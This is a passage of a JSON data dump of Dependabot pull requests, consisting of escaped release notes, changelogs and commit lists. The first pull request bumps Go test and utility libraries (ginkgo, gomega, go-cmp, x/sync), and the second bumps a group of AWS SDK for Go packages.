[465a8ec]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1313\"\u003e#1313\u003c/a\u003e) [eab0e40]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1317\"\u003e#1317\u003c/a\u003e) [fbf9724]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/crypto (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1318\"\u003e#1318\u003c/a\u003e) [3ee80ee]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.14.0 to 0.16.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1306\"\u003e#1306\u003c/a\u003e) [123e1d5]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/gomega from 1.29.0 to 1.30.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1297\"\u003e#1297\u003c/a\u003e) [558f6e0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1307\"\u003e#1307\u003c/a\u003e) [84ff7f3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/7fa019079a7b6cfe92acac92df4a84f2748e45a4\"\u003e\u003ccode\u003e7fa0190\u003c/code\u003e\u003c/a\u003e v2.15.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/c245d09a1a083f643ad2b91878cf060146cc94e3\"\u003e\u003ccode\u003ec245d09\u003c/code\u003e\u003c/a\u003e emit output of failed go tool cover invocation so users can try to debug thin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/dca77c807c02fbc18dcc957c8e605424dbb5a891\"\u003e\u003ccode\u003edca77c8\u003c/code\u003e\u003c/a\u003e fix outline when using nodot inginkgo v2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/96e915c326d0265f3bb0f662672573f124fcd38d\"\u003e\u003ccode\u003e96e915c\u003c/code\u003e\u003c/a\u003e include cancellation reason when cancelling spec context\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/4fcd0b3559d887317826a9d604b947d6b2b52b1c\"\u003e\u003ccode\u003e4fcd0b3\u003c/code\u003e\u003c/a\u003e Bump to go 1.20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/732abbc3e709c4913e7f0644c1aee1faf076f0ea\"\u003e\u003ccode\u003e732abbc\u003c/code\u003e\u003c/a\u003e clarify that last owner label wins\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/8f3bd70cc78b00986aaf7fc8e9fbd77df05e6b26\"\u003e\u003ccode\u003e8f3bd70\u003c/code\u003e\u003c/a\u003e JUnit reports now interpret Label(owner:X) and set owner to X.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/dbaf18fd0af2b798961b08ee9c0a3266d3abadd6\"\u003e\u003ccode\u003edbaf18f\u003c/code\u003e\u003c/a\u003e Document areas where GinkgoT() behaves differently from testing.T\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/6f67a147b39873678462615d412cfb0177463bf1\"\u003e\u003ccode\u003e6f67a14\u003c/code\u003e\u003c/a\u003e bugfix(docs): use Unsetenv instead of Clearenv (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1337\"\u003e#1337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/beaf16d17f98f30365a11ff236583d611c094078\"\u003e\u003ccode\u003ebeaf16d\u003c/code\u003e\u003c/a\u003e v2.14.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/onsi/ginkgo/compare/v2.13.2...v2.15.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.29.0 to 1.31.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.31.1\u003c/h2\u003e\n\u003ch2\u003e1.31.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInverted arguments order of FailureMessage of BeComparableToMatcher [e0dd999]\u003c/li\u003e\n\u003cli\u003eUpdate test in case keeping msg is desired [ad1a367]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow how to import the format sub package [24e958d]\u003c/li\u003e\n\u003cli\u003etidy up go.sum [26661b8]\u003c/li\u003e\n\u003cli\u003ebump dependencies [bde8f7a]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.31.0\u003c/h2\u003e\n\u003ch2\u003e1.31.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAsync assertions include context cancellation cause if present [121c37f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump minimum go version [dee1e3c]\u003c/li\u003e\n\u003cli\u003edocs: fix typo in example usage \u0026quot;occured\u0026quot; -\u0026gt; \u0026quot;occurred\u0026quot; [49005fe]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/714\"\u003e#714\u003c/a\u003e) [f1c8757]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/715\"\u003e#715\u003c/a\u003e) [9836e76]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/ginkgo/v2 from 2.13.0 to 2.13.2 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/713\"\u003e#713\u003c/a\u003e) [54726f0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/711\"\u003e#711\u003c/a\u003e) [df97ecc]\u003c/li\u003e\n\u003cli\u003edocs: fix \u003ccode\u003eHaveExactElement\u003c/code\u003e typo (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/712\"\u003e#712\u003c/a\u003e) [a672c86]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.30.0\u003c/h2\u003e\n\u003ch2\u003e1.30.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBeTrueBecause and BeFalseBecause allow for better failure messages [4da4c7f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump actions/checkout from 3 to 4 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/694\"\u003e#694\u003c/a\u003e) [6ca6e97]\u003c/li\u003e\n\u003cli\u003edoc: fix type on gleak go doc [f1b8343]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/gomega's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.31.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInverted arguments order of FailureMessage of BeComparableToMatcher [e0dd999]\u003c/li\u003e\n\u003cli\u003eUpdate test in case keeping msg is desired [ad1a367]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow how to import the format sub package [24e958d]\u003c/li\u003e\n\u003cli\u003etidy up go.sum [26661b8]\u003c/li\u003e\n\u003cli\u003ebump dependencies [bde8f7a]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.31.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAsync assertions include context cancellation cause if present [121c37f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump minimum go version [dee1e3c]\u003c/li\u003e\n\u003cli\u003edocs: fix typo in example usage \u0026quot;occured\u0026quot; -\u0026gt; \u0026quot;occurred\u0026quot; [49005fe]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/714\"\u003e#714\u003c/a\u003e) [f1c8757]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/715\"\u003e#715\u003c/a\u003e) [9836e76]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/ginkgo/v2 from 2.13.0 to 2.13.2 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/713\"\u003e#713\u003c/a\u003e) [54726f0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/711\"\u003e#711\u003c/a\u003e) [df97ecc]\u003c/li\u003e\n\u003cli\u003edocs: fix \u003ccode\u003eHaveExactElement\u003c/code\u003e typo (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/712\"\u003e#712\u003c/a\u003e) [a672c86]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e1.30.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBeTrueBecause and BeFalseBecause allow for better failure messages [4da4c7f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump actions/checkout from 3 to 4 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/694\"\u003e#694\u003c/a\u003e) [6ca6e97]\u003c/li\u003e\n\u003cli\u003edoc: fix type on gleak go doc [f1b8343]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/762b171852113d80d8fc360558cccbccdc46af70\"\u003e\u003ccode\u003e762b171\u003c/code\u003e\u003c/a\u003e v1.31.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/26661b8d34c7d8205844de07a3ec5637a595bef6\"\u003e\u003ccode\u003e26661b8\u003c/code\u003e\u003c/a\u003e tidy up go.sum\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/bde8f7a2c07ccfc535b2d9082e7dcaa1fbca91c5\"\u003e\u003ccode\u003ebde8f7a\u003c/code\u003e\u003c/a\u003e bump dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/24e958d368b1e67070bded6ddd1a108d70698b14\"\u003e\u003ccode\u003e24e958d\u003c/code\u003e\u003c/a\u003e Show how to import the format sub package\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/ad1a367ab5b86a7abad96a75ac25f1383fa97e69\"\u003e\u003ccode\u003ead1a367\u003c/code\u003e\u003c/a\u003e Update test in case keeping msg is desired\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/e0dd999861372e3b7838b6719258eee5fd16276a\"\u003e\u003ccode\u003ee0dd999\u003c/code\u003e\u003c/a\u003e Inverted arguments order of FailureMessage of BeComparableToMatcher\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/ba8bba2272bbf185a144b2681b5ed1f72d7f04f7\"\u003e\u003ccode\u003eba8bba2\u003c/code\u003e\u003c/a\u003e v1.31.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/121c37f100b97f1d2c3f68c436f92bd7df4a120a\"\u003e\u003ccode\u003e121c37f\u003c/code\u003e\u003c/a\u003e Async assertions include context cancellation cause if present\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/dee1e3cc5e375dedf8360bf3d673a433ef04b948\"\u003e\u003ccode\u003edee1e3c\u003c/code\u003e\u003c/a\u003e Bump minimum go version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/gomega/commit/49005fe1960542f223c64b1af4e7544d34746a01\"\u003e\u003ccode\u003e49005fe\u003c/code\u003e\u003c/a\u003e docs: fix typo in example usage \u0026quot;occured\u0026quot; -\u0026gt; \u0026quot;occurred\u0026quot;\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/onsi/gomega/compare/v1.29.0...v1.31.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/google/go-cmp` from 0.6.0 to 0.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/google/go-cmp/releases\"\u003egithub.com/google/go-cmp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003cp\u003eNew API:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e(\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/367\"\u003e#367\u003c/a\u003e) Support compare functions with SortSlices and SortMaps\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003ePanic messaging:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e(\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/370\"\u003e#370\u003c/a\u003e) Detect proto.Message types when failing to export a field\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/google/go-cmp/commit/9b12f366a942ebc7254abc7f32ca05068b455fb7\"\u003e\u003ccode\u003e9b12f36\u003c/code\u003e\u003c/a\u003e Detect proto.Message types when failing to export a field (\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/370\"\u003e#370\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/google/go-cmp/commit/4dd3d63d6987c0f84fce8e1d1c5bb59f0badc220\"\u003e\u003ccode\u003e4dd3d63\u003c/code\u003e\u003c/a\u003e fix: type 'aribica' =\u0026gt; 'arabica' (\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/368\"\u003e#368\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/google/go-cmp/commit/391980c4b2e1cc2c30d2bfae6039815350490495\"\u003e\u003ccode\u003e391980c\u003c/code\u003e\u003c/a\u003e Support compare functions with SortSlices and SortMaps (\u003ca href=\"https://redirect.github.com/google/go-cmp/issues/367\"\u003e#367\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/google/go-cmp/compare/v0.6.0...v0.7.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/sync` from 0.6.0 to 0.20.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/ec11c4a93de22cde2abe2bf74d70791033c2464c\"\u003e\u003ccode\u003eec11c4a\u003c/code\u003e\u003c/a\u003e errgroup: fix a typo in the documentation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/1a583072c11b16c643c8f6051ff1fab5a424d0a9\"\u003e\u003ccode\u003e1a58307\u003c/code\u003e\u003c/a\u003e all: modernize interface{} -\u0026gt; any\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/3172ca581eb96530283f713311f81df986c19932\"\u003e\u003ccode\u003e3172ca5\u003c/code\u003e\u003c/a\u003e all: upgrade go directive to at least 1.25.0 [generated]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/2a180e22fddcc336475e72aa950be958c1b68d33\"\u003e\u003ccode\u003e2a180e2\u003c/code\u003e\u003c/a\u003e errgroup: use consistent read for SetLimit panic\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/1966f539bbd7664efd5bb7462ae94d9db67f4502\"\u003e\u003ccode\u003e1966f53\u003c/code\u003e\u003c/a\u003e errgroup: fix some typos in comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/04914c200cb38d4ea960ee6a4c314a028c632991\"\u003e\u003ccode\u003e04914c2\u003c/code\u003e\u003c/a\u003e all: upgrade go directive to at least 1.24.0 [generated]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/7fad2c9213e0821bd78435a9c106806f2fc383f1\"\u003e\u003ccode\u003e7fad2c9\u003c/code\u003e\u003c/a\u003e errgroup: revert propagation of panics\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/8a14946fb031f4bf6096242b5e6ae6f7316d47d8\"\u003e\u003ccode\u003e8a14946\u003c/code\u003e\u003c/a\u003e errgroup: remove duplicated comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/1869c690bf11da5dd230e188d03a612a4a3f8ba6\"\u003e\u003ccode\u003e1869c69\u003c/code\u003e\u003c/a\u003e all: replace deprecated ioutil\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/sync/commit/d1ac909e84c04f4326f620436b3894b3f5de0bd4\"\u003e\u003ccode\u003ed1ac909\u003c/code\u003e\u003c/a\u003e sync/errgroup: PanicError.Error print stack trace\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/sync/compare/v0.6.0...v0.20.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\n\n\n\u003c/details\u003e","html_url":"https://github.com/omnius-labs/core-go/pull/6","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/omnius-labs%2Fcore-go/issues/6","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/6/packages"},{"uuid":"4381486214","node_id":"PR_kwDOAOaWjc7YQqGB","number":124085,"state":"closed","title":"deps(go): bump the aws-sdk-go group across 1 directory with 14 updates","user":"dependabot[bot]","labels":["area/backend","no-changelog"],"assignees":[],"locked":false,"comments_count":6,"pull_request":true,"closed_at":"2026-05-11T08:09:39.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-05T04:19:31.000Z","updated_at":"2026-05-11T08:09:50.000Z","time_to_close":532208,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"deps(go): bump","group_name":"aws-sdk-go","update_count":14,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.41.6","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.32.15","new_version":"1.32.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/bedrockruntime","old_version":"1.50.5","new_version":"1.50.6","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatch","old_version":"1.45.3","new_version":"1.57.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs","old_version":"1.51.0","new_version":"1.73.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.296.0","new_version":"1.300.0","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/oam","old_version":"1.18.3","new_version":"1.23.17","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi","old_version":"1.26.6","new_version":"1.31.12","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/s3","old_version":"1.97.1","new_version":"1.100.1","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/secretsmanager","old_version":"1.40.1","new_version":"1.41.7","repository_url":"https://github.com/aws/aws-sdk-go-v2"}],"path":null,"ecosystem":"go"},"body":"Bumps the aws-sdk-go group with 11 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.41.6` | `1.41.7` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.32.15` | `1.32.17` |\n| [github.com/aws/aws-sdk-go-v2/service/bedrockruntime](https://github.com/aws/aws-sdk-go-v2) | `1.50.5` | `1.50.6` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatch](https://github.com/aws/aws-sdk-go-v2) | `1.45.3` | `1.57.0` |\n| [github.com/aws/aws-sdk-go-v2/service/cloudwatchlogs](https://github.com/aws/aws-sdk-go-v2) | `1.51.0` | `1.73.0` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.296.0` | `1.300.0` |\n| [github.com/aws/aws-sdk-go-v2/service/oam](https://github.com/aws/aws-sdk-go-v2) | `1.18.3` | `1.23.17` |\n| [github.com/aws/aws-sdk-go-v2/service/resourcegroupstaggingapi](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.31.12` |\n| [github.com/aws/aws-sdk-go-v2/service/s3](https://github.com/aws/aws-sdk-go-v2) | `1.97.1` | `1.100.1` |\n| [github.com/aws/aws-sdk-go-v2/service/secretsmanager](https://github.com/aws/aws-sdk-go-v2) | `1.40.1` | `1.41.7` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.41.6 to 1.41.7\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/2223642aeafb3b46ae924667ee47d31a1cf5a9d5\"\u003e\u003ccode\u003e2223642\u003c/code\u003e\u003c/a\u003e Release 2026-04-29\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/04c7e460121eafa42577be08289bd0da0de091b2\"\u003e\u003ccode\u003e04c7e46\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/5f5692571a7afce76e1573da3fbf2180a2c297cc\"\u003e\u003ccode\u003e5f56925\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/aac6d2b8fefd47203d3b4bd5f229ca275272ec62\"\u003e\u003ccode\u003eaac6d2b\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/bdaead7d2074e479fc56da77491fe65737413664\"\u003e\u003ccode\u003ebdaead7\u003c/code\u003e\u003c/a\u003e upgrade to smithy-go v1.25.1 (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3399\"\u003e#3399\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 